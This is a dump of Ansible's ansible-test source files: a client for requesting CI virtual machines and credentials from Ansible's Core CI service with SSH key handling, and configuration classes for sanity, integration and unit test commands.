Raises an exception if any item in the given sequence does not match the specified guard type.
Use with assert so that type checkers are aware of the type guard.
"""
invalid_types = set(type(item) for item in sequence if not isinstance(item, guard_type))
if not invalid_types:
return True
invalid_type_names = sorted(str(item) for item in invalid_types)
raise Exception(f'Sequence required to contain only {guard_type} includes: {", ".join(invalid_type_names)}')
display = Display() # pylint: disable=locally-disabled, invalid-name
_enable_vendoring()
| 38,868
|
Python
|
.py
| 897
| 36.254181
| 157
| 0.653997
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,098
|
core_ci.py
|
ansible_ansible/test/lib/ansible_test/_internal/core_ci.py
|
"""Access Ansible Core CI remote services."""
from __future__ import annotations
import abc
import dataclasses
import json
import os
import re
import stat
import traceback
import uuid
import time
import typing as t
from .http import (
HttpClient,
HttpResponse,
HttpError,
)
from .io import (
make_dirs,
read_text_file,
write_json_file,
write_text_file,
)
from .util import (
ApplicationError,
display,
mutex,
)
from .util_common import (
run_command,
ResultType,
)
from .config import (
EnvironmentConfig,
)
from .ci import (
get_ci_provider,
)
from .data import (
data_context,
PayloadConfig,
)
@dataclasses.dataclass(frozen=True)
class Resource(metaclass=abc.ABCMeta):
"""Base class for Ansible Core CI resources."""
@abc.abstractmethod
def as_tuple(self) -> tuple[str, str, str, str]:
"""Return the resource as a tuple of platform, version, architecture and provider."""
@abc.abstractmethod
def get_label(self) -> str:
"""Return a user-friendly label for this resource."""
@property
@abc.abstractmethod
def persist(self) -> bool:
"""True if the resource is persistent, otherwise false."""
@dataclasses.dataclass(frozen=True)
class VmResource(Resource):
"""Details needed to request a VM from Ansible Core CI."""
platform: str
version: str
architecture: str
provider: str
tag: str
def as_tuple(self) -> tuple[str, str, str, str]:
"""Return the resource as a tuple of platform, version, architecture and provider."""
return self.platform, self.version, self.architecture, self.provider
def get_label(self) -> str:
"""Return a user-friendly label for this resource."""
return f'{self.platform} {self.version} ({self.architecture}) [{self.tag}] @{self.provider}'
@property
def persist(self) -> bool:
"""True if the resource is persistent, otherwise false."""
return True
@dataclasses.dataclass(frozen=True)
class CloudResource(Resource):
"""Details needed to request cloud credentials from Ansible Core CI."""
platform: str
def as_tuple(self) -> tuple[str, str, str, str]:
"""Return the resource as a tuple of platform, version, architecture and provider."""
return self.platform, '', '', self.platform
def get_label(self) -> str:
"""Return a user-friendly label for this resource."""
return self.platform
@property
def persist(self) -> bool:
"""True if the resource is persistent, otherwise false."""
return False
class AnsibleCoreCI:
"""Client for Ansible Core CI services."""
DEFAULT_ENDPOINT = 'https://ansible-core-ci.testing.ansible.com'
def __init__(
self,
args: EnvironmentConfig,
resource: Resource,
load: bool = True,
) -> None:
self.args = args
self.resource = resource
self.platform, self.version, self.arch, self.provider = self.resource.as_tuple()
self.stage = args.remote_stage
self.client = HttpClient(args)
self.connection = None
self.instance_id = None
self.endpoint = None
self.default_endpoint = args.remote_endpoint or self.DEFAULT_ENDPOINT
self.retries = 3
self.ci_provider = get_ci_provider()
self.label = self.resource.get_label()
stripped_label = re.sub('[^A-Za-z0-9_.]+', '-', self.label).strip('-')
self.name = f"{stripped_label}-{self.stage}" # turn the label into something suitable for use as a filename
self.path = os.path.expanduser(f'~/.ansible/test/instances/{self.name}')
self.ssh_key = SshKey(args)
if self.resource.persist and load and self._load():
try:
display.info(f'Checking existing {self.label} instance using: {self._uri}', verbosity=1)
self.connection = self.get(always_raise_on=[404])
display.info(f'Loaded existing {self.label} instance.', verbosity=1)
except HttpError as ex:
if ex.status != 404:
raise
self._clear()
display.info(f'Cleared stale {self.label} instance.', verbosity=1)
self.instance_id = None
self.endpoint = None
elif not self.resource.persist:
self.instance_id = None
self.endpoint = None
self._clear()
if self.instance_id:
self.started: bool = True
else:
self.started = False
self.instance_id = str(uuid.uuid4())
self.endpoint = None
display.sensitive.add(self.instance_id)
if not self.endpoint:
self.endpoint = self.default_endpoint
@property
def available(self) -> bool:
"""Return True if Ansible Core CI is supported."""
return self.ci_provider.supports_core_ci_auth()
def start(self) -> t.Optional[dict[str, t.Any]]:
"""Start instance."""
if self.started:
display.info(f'Skipping started {self.label} instance.', verbosity=1)
return None
return self._start(self.ci_provider.prepare_core_ci_auth())
def stop(self) -> None:
"""Stop instance."""
if not self.started:
display.info(f'Skipping invalid {self.label} instance.', verbosity=1)
return
response = self.client.delete(self._uri)
if response.status_code == 404:
self._clear()
display.info(f'Cleared invalid {self.label} instance.', verbosity=1)
return
if response.status_code == 200:
self._clear()
display.info(f'Stopped running {self.label} instance.', verbosity=1)
return
raise self._create_http_error(response)
def get(self, tries: int = 3, sleep: int = 15, always_raise_on: t.Optional[list[int]] = None) -> t.Optional[InstanceConnection]:
"""Get instance connection information."""
if not self.started:
display.info(f'Skipping invalid {self.label} instance.', verbosity=1)
return None
if not always_raise_on:
always_raise_on = []
if self.connection and self.connection.running:
return self.connection
while True:
tries -= 1
response = self.client.get(self._uri)
if response.status_code == 200:
break
error = self._create_http_error(response)
if not tries or response.status_code in always_raise_on:
raise error
display.warning(f'{error}. Trying again after {sleep} seconds.')
time.sleep(sleep)
if self.args.explain:
self.connection = InstanceConnection(
running=True,
hostname='cloud.example.com',
port=12345,
username='root',
password='password' if self.platform == 'windows' else None,
)
else:
response_json = response.json()
status = response_json['status']
con = response_json.get('connection')
if con:
self.connection = InstanceConnection(
running=status == 'running',
hostname=con['hostname'],
port=int(con['port']),
username=con['username'],
password=con.get('password'),
response_json=response_json,
)
else:
self.connection = InstanceConnection(
running=status == 'running',
response_json=response_json,
)
if self.connection.password:
display.sensitive.add(str(self.connection.password))
status = 'running' if self.connection.running else 'starting'
display.info(f'The {self.label} instance is {status}.', verbosity=1)
return self.connection
def wait(self, iterations: t.Optional[int] = 90) -> None:
"""Wait for the instance to become ready."""
for _iteration in range(1, iterations):
if self.get().running:
return
time.sleep(10)
raise ApplicationError(f'Timeout waiting for {self.label} instance.')
@property
def _uri(self) -> str:
return f'{self.endpoint}/{self.stage}/{self.provider}/{self.instance_id}'
def _start(self, auth) -> dict[str, t.Any]:
"""Start instance."""
display.info(f'Initializing new {self.label} instance using: {self._uri}', verbosity=1)
data = dict(
config=dict(
platform=self.platform,
version=self.version,
architecture=self.arch,
public_key=self.ssh_key.pub_contents,
)
)
data.update(auth=auth)
headers = {
'Content-Type': 'application/json',
}
response = self._start_endpoint(data, headers)
self.started = True
self._save()
display.info(f'Started {self.label} instance.', verbosity=1)
if self.args.explain:
return {}
return response.json()
def _start_endpoint(self, data: dict[str, t.Any], headers: dict[str, str]) -> HttpResponse:
tries = self.retries
sleep = 15
while True:
tries -= 1
response = self.client.put(self._uri, data=json.dumps(data), headers=headers)
if response.status_code == 200:
return response
error = self._create_http_error(response)
if response.status_code == 503:
raise error
if not tries:
raise error
display.warning(f'{error}. Trying again after {sleep} seconds.')
time.sleep(sleep)
def _clear(self) -> None:
"""Clear instance information."""
try:
self.connection = None
os.remove(self.path)
except FileNotFoundError:
pass
def _load(self) -> bool:
"""Load instance information."""
try:
data = read_text_file(self.path)
except FileNotFoundError:
return False
if not data.startswith('{'):
return False # legacy format
config = json.loads(data)
return self.load(config)
def load(self, config: dict[str, str]) -> bool:
"""Load the instance from the provided dictionary."""
self.instance_id = str(config['instance_id'])
self.endpoint = config['endpoint']
self.started = True
display.sensitive.add(self.instance_id)
return True
def _save(self) -> None:
"""Save instance information."""
if self.args.explain:
return
config = self.save()
write_json_file(self.path, config, create_directories=True)
def save(self) -> dict[str, str]:
"""Save instance details and return as a dictionary."""
return dict(
label=self.resource.get_label(),
instance_id=self.instance_id,
endpoint=self.endpoint,
)
@staticmethod
def _create_http_error(response: HttpResponse) -> ApplicationError:
"""Return an exception created from the given HTTP response."""
response_json = response.json()
stack_trace = ''
if 'message' in response_json:
message = response_json['message']
elif 'errorMessage' in response_json:
message = response_json['errorMessage'].strip()
if 'stackTrace' in response_json:
traceback_lines = response_json['stackTrace']
# AWS Lambda on Python 2.7 returns a list of tuples
# AWS Lambda on Python 3.7 returns a list of strings
if traceback_lines and isinstance(traceback_lines[0], list):
traceback_lines = traceback.format_list(traceback_lines)
trace = '\n'.join([x.rstrip() for x in traceback_lines])
stack_trace = f'\nTraceback (from remote server):\n{trace}'
else:
message = str(response_json)
return CoreHttpError(response.status_code, message, stack_trace)
class CoreHttpError(HttpError):
"""HTTP response as an error."""
def __init__(self, status: int, remote_message: str, remote_stack_trace: str) -> None:
super().__init__(status, f'{remote_message}{remote_stack_trace}')
self.remote_message = remote_message
self.remote_stack_trace = remote_stack_trace
class SshKey:
"""Container for SSH key used to connect to remote instances."""
KEY_TYPE = 'rsa' # RSA is used to maintain compatibility with paramiko and EC2
KEY_NAME = f'id_{KEY_TYPE}'
PUB_NAME = f'{KEY_NAME}.pub'
@mutex
def __init__(self, args: EnvironmentConfig) -> None:
key_pair = self.get_key_pair()
if not key_pair:
key_pair = self.generate_key_pair(args)
key, pub = key_pair
key_dst, pub_dst = self.get_in_tree_key_pair_paths()
def ssh_key_callback(payload_config: PayloadConfig) -> None:
"""
Add the SSH keys to the payload file list.
They are either outside the source tree or in the cache dir which is ignored by default.
"""
files = payload_config.files
permissions = payload_config.permissions
files.append((key, os.path.relpath(key_dst, data_context().content.root)))
files.append((pub, os.path.relpath(pub_dst, data_context().content.root)))
permissions[os.path.relpath(key_dst, data_context().content.root)] = stat.S_IRUSR | stat.S_IWUSR
data_context().register_payload_callback(ssh_key_callback)
self.key, self.pub = key, pub
if args.explain:
self.pub_contents = None
self.key_contents = None
else:
self.pub_contents = read_text_file(self.pub).strip()
self.key_contents = read_text_file(self.key).strip()
@staticmethod
def get_relative_in_tree_private_key_path() -> str:
"""Return the ansible-test SSH private key path relative to the content tree."""
temp_dir = ResultType.TMP.relative_path
key = os.path.join(temp_dir, SshKey.KEY_NAME)
return key
def get_in_tree_key_pair_paths(self) -> t.Optional[tuple[str, str]]:
"""Return the ansible-test SSH key pair paths from the content tree."""
temp_dir = ResultType.TMP.path
key = os.path.join(temp_dir, self.KEY_NAME)
pub = os.path.join(temp_dir, self.PUB_NAME)
return key, pub
def get_source_key_pair_paths(self) -> t.Optional[tuple[str, str]]:
"""Return the ansible-test SSH key pair paths for the current user."""
base_dir = os.path.expanduser('~/.ansible/test/')
key = os.path.join(base_dir, self.KEY_NAME)
pub = os.path.join(base_dir, self.PUB_NAME)
return key, pub
def get_key_pair(self) -> t.Optional[tuple[str, str]]:
"""Return the ansible-test SSH key pair paths if present, otherwise return None."""
key, pub = self.get_in_tree_key_pair_paths()
if os.path.isfile(key) and os.path.isfile(pub):
return key, pub
key, pub = self.get_source_key_pair_paths()
if os.path.isfile(key) and os.path.isfile(pub):
return key, pub
return None
def generate_key_pair(self, args: EnvironmentConfig) -> tuple[str, str]:
"""Generate an SSH key pair for use by all ansible-test invocations for the current user."""
key, pub = self.get_source_key_pair_paths()
if not args.explain:
make_dirs(os.path.dirname(key))
if not os.path.isfile(key) or not os.path.isfile(pub):
run_command(args, ['ssh-keygen', '-m', 'PEM', '-q', '-t', self.KEY_TYPE, '-N', '', '-f', key], capture=True)
if args.explain:
return key, pub
# newer ssh-keygen PEM output (such as on RHEL 8.1) is not recognized by paramiko
key_contents = read_text_file(key)
key_contents = re.sub(r'(BEGIN|END) PRIVATE KEY', r'\1 RSA PRIVATE KEY', key_contents)
write_text_file(key, key_contents)
return key, pub
class InstanceConnection:
"""Container for remote instance status and connection details."""
def __init__(
self,
running: bool,
hostname: t.Optional[str] = None,
port: t.Optional[int] = None,
username: t.Optional[str] = None,
password: t.Optional[str] = None,
response_json: t.Optional[dict[str, t.Any]] = None,
) -> None:
self.running = running
self.hostname = hostname
self.port = port
self.username = username
self.password = password
self.response_json = response_json or {}
def __str__(self):
if self.password:
return f'{self.hostname}:{self.port} [{self.username}:{self.password}]'
return f'{self.hostname}:{self.port} [{self.username}]'
| 17,309
|
Python
|
.py
| 414
| 32.091787
| 132
| 0.603617
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,099
|
config.py
|
ansible_ansible/test/lib/ansible_test/_internal/config.py
|
"""Configuration classes."""
from __future__ import annotations
import dataclasses
import enum
import os
import sys
import typing as t
from .util import (
verify_sys_executable,
version_to_str,
type_guard,
)
from .util_common import (
CommonConfig,
)
from .metadata import (
Metadata,
)
from .data import (
data_context,
PayloadConfig,
)
from .host_configs import (
ControllerConfig,
ControllerHostConfig,
HostConfig,
HostSettings,
OriginConfig,
PythonConfig,
VirtualPythonConfig,
)
THostConfig = t.TypeVar('THostConfig', bound=HostConfig)
class TerminateMode(enum.Enum):
"""When to terminate instances."""
ALWAYS = enum.auto()
NEVER = enum.auto()
SUCCESS = enum.auto()
def __str__(self):
return self.name.lower()
@dataclasses.dataclass(frozen=True)
class ModulesConfig:
"""Configuration for modules."""
python_requires: str
python_versions: tuple[str, ...]
controller_only: bool
@dataclasses.dataclass(frozen=True)
class ContentConfig:
"""Configuration for all content."""
modules: ModulesConfig
python_versions: tuple[str, ...]
class EnvironmentConfig(CommonConfig):
"""Configuration common to all commands which execute in an environment."""
def __init__(self, args: t.Any, command: str) -> None:
super().__init__(args, command)
self.host_settings: HostSettings = args.host_settings
self.host_path: t.Optional[str] = args.host_path
self.containers: t.Optional[str] = args.containers
self.pypi_proxy: bool = args.pypi_proxy
self.pypi_endpoint: t.Optional[str] = args.pypi_endpoint
# Populated by content_config.get_content_config on the origin.
# Serialized and passed to delegated instances to avoid parsing a second time.
self.content_config: t.Optional[ContentConfig] = None
# Set by check_controller_python once HostState has been created by prepare_profiles.
# This is here for convenience, to avoid needing to pass HostState to some functions which already have access to EnvironmentConfig.
self.controller_python: t.Optional[PythonConfig] = None
"""
The Python interpreter used by the controller.
Only available after delegation has been performed or skipped (if delegation is not required).
"""
if self.host_path:
self.delegate = False
else:
self.delegate = (
not isinstance(self.controller, OriginConfig)
or isinstance(self.controller.python, VirtualPythonConfig)
or self.controller.python.version != version_to_str(sys.version_info[:2])
or bool(verify_sys_executable(self.controller.python.path))
)
self.docker_network: t.Optional[str] = args.docker_network
self.docker_terminate: t.Optional[TerminateMode] = args.docker_terminate
self.remote_endpoint: t.Optional[str] = args.remote_endpoint
self.remote_stage: t.Optional[str] = args.remote_stage
self.remote_terminate: t.Optional[TerminateMode] = args.remote_terminate
self.prime_containers: bool = args.prime_containers
self.requirements: bool = args.requirements
self.delegate_args: list[str] = []
self.dev_systemd_debug: bool = args.dev_systemd_debug
self.dev_probe_cgroups: t.Optional[str] = args.dev_probe_cgroups
def host_callback(payload_config: PayloadConfig) -> None:
"""Add the host files to the payload file list."""
config = self
if config.host_path:
settings_path = os.path.join(config.host_path, 'settings.dat')
state_path = os.path.join(config.host_path, 'state.dat')
config_path = os.path.join(config.host_path, 'config.dat')
files = payload_config.files
files.append((os.path.abspath(settings_path), settings_path))
files.append((os.path.abspath(state_path), state_path))
files.append((os.path.abspath(config_path), config_path))
data_context().register_payload_callback(host_callback)
@property
def controller(self) -> ControllerHostConfig:
"""Host configuration for the controller."""
return self.host_settings.controller
@property
def targets(self) -> list[HostConfig]:
"""Host configuration for the targets."""
return self.host_settings.targets
def only_target(self, target_type: t.Type[THostConfig]) -> THostConfig:
"""
Return the host configuration for the target.
Requires that there is exactly one target of the specified type.
"""
targets = list(self.targets)
if len(targets) != 1:
raise Exception('There must be exactly one target.')
target = targets.pop()
if not isinstance(target, target_type):
raise Exception(f'Target is {type(target_type)} instead of {target_type}.')
return target
def only_targets(self, target_type: t.Type[THostConfig]) -> list[THostConfig]:
"""
Return a list of target host configurations.
Requires that there are one or more targets, all the specified type.
"""
if not self.targets:
raise Exception('There must be one or more targets.')
assert type_guard(self.targets, target_type)
return t.cast(list[THostConfig], self.targets)
@property
def target_type(self) -> t.Type[HostConfig]:
"""
The true type of the target(s).
If the target is the controller, the controller type is returned.
Requires at least one target, and all targets must be of the same type.
"""
target_types = set(type(target) for target in self.targets)
if len(target_types) != 1:
raise Exception('There must be one or more targets, all of the same type.')
target_type = target_types.pop()
if issubclass(target_type, ControllerConfig):
target_type = type(self.controller)
return target_type
class TestConfig(EnvironmentConfig):
"""Configuration common to all test commands."""
def __init__(self, args: t.Any, command: str) -> None:
super().__init__(args, command)
self.coverage: bool = args.coverage
self.coverage_check: bool = args.coverage_check
self.include: list[str] = args.include or []
self.exclude: list[str] = args.exclude or []
self.require: list[str] = args.require or []
self.changed: bool = args.changed
self.tracked: bool = args.tracked
self.untracked: bool = args.untracked
self.committed: bool = args.committed
self.staged: bool = args.staged
self.unstaged: bool = args.unstaged
self.changed_from: str = args.changed_from
self.changed_path: list[str] = args.changed_path
self.base_branch: str = args.base_branch
self.lint: bool = getattr(args, 'lint', False)
self.junit: bool = getattr(args, 'junit', False)
self.failure_ok: bool = getattr(args, 'failure_ok', False)
self.metadata = Metadata.from_file(args.metadata) if args.metadata else Metadata()
self.metadata_path: t.Optional[str] = None
if self.coverage_check:
self.coverage = True
def metadata_callback(payload_config: PayloadConfig) -> None:
"""Add the metadata file to the payload file list."""
config = self
files = payload_config.files
if config.metadata_path:
files.append((os.path.abspath(config.metadata_path), config.metadata_path))
data_context().register_payload_callback(metadata_callback)
class ShellConfig(EnvironmentConfig):
"""Configuration for the shell command."""
def __init__(self, args: t.Any) -> None:
super().__init__(args, 'shell')
self.cmd: list[str] = args.cmd
self.raw: bool = args.raw
self.check_layout = self.delegate # allow shell to be used without a valid layout as long as no delegation is required
self.interactive = sys.stdin.isatty() and not args.cmd # delegation should only be interactive when stdin is a TTY and no command was given
self.export: t.Optional[str] = args.export
self.display_stderr = True
class SanityConfig(TestConfig):
"""Configuration for the sanity command."""
def __init__(self, args: t.Any) -> None:
super().__init__(args, 'sanity')
self.test: list[str] = args.test
self.skip_test: list[str] = args.skip_test
self.list_tests: bool = args.list_tests
self.allow_disabled: bool = args.allow_disabled
self.enable_optional_errors: bool = args.enable_optional_errors
self.prime_venvs: bool = args.prime_venvs
self.display_stderr = self.lint or self.list_tests
class IntegrationConfig(TestConfig):
"""Configuration for the integration command."""
def __init__(self, args: t.Any, command: str) -> None:
super().__init__(args, command)
self.start_at: str = args.start_at
self.start_at_task: str = args.start_at_task
self.allow_destructive: bool = args.allow_destructive
self.allow_root: bool = args.allow_root
self.allow_disabled: bool = args.allow_disabled
self.allow_unstable: bool = args.allow_unstable
self.allow_unstable_changed: bool = args.allow_unstable_changed
self.allow_unsupported: bool = args.allow_unsupported
self.retry_on_error: bool = args.retry_on_error
self.continue_on_error: bool = args.continue_on_error
self.debug_strategy: bool = args.debug_strategy
self.changed_all_target: str = args.changed_all_target
self.changed_all_mode: str = args.changed_all_mode
self.list_targets: bool = args.list_targets
self.tags = args.tags
self.skip_tags = args.skip_tags
self.diff = args.diff
self.no_temp_workdir: bool = args.no_temp_workdir
self.no_temp_unicode: bool = args.no_temp_unicode
if self.list_targets:
self.explain = True
self.display_stderr = True
def get_ansible_config(self) -> str:
"""Return the path to the Ansible config for the given config."""
ansible_config_relative_path = os.path.join(data_context().content.integration_path, '%s.cfg' % self.command)
ansible_config_path = os.path.join(data_context().content.root, ansible_config_relative_path)
if not os.path.exists(ansible_config_path):
# use the default empty configuration unless one has been provided
ansible_config_path = super().get_ansible_config()
return ansible_config_path
TIntegrationConfig = t.TypeVar('TIntegrationConfig', bound=IntegrationConfig)
class PosixIntegrationConfig(IntegrationConfig):
"""Configuration for the posix integration command."""
def __init__(self, args: t.Any) -> None:
super().__init__(args, 'integration')
class WindowsIntegrationConfig(IntegrationConfig):
"""Configuration for the windows integration command."""
def __init__(self, args: t.Any) -> None:
super().__init__(args, 'windows-integration')
class NetworkIntegrationConfig(IntegrationConfig):
"""Configuration for the network integration command."""
def __init__(self, args: t.Any) -> None:
super().__init__(args, 'network-integration')
self.testcase: str = args.testcase
class UnitsConfig(TestConfig):
"""Configuration for the units command."""
def __init__(self, args: t.Any) -> None:
super().__init__(args, 'units')
self.collect_only: bool = args.collect_only
self.num_workers: int = args.num_workers
self.requirements_mode: str = getattr(args, 'requirements_mode', '')
if self.requirements_mode == 'only':
self.requirements = True
elif self.requirements_mode == 'skip':
self.requirements = False
| 12,131
|
Python
|
.py
| 255
| 39.341176
| 148
| 0.662818
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|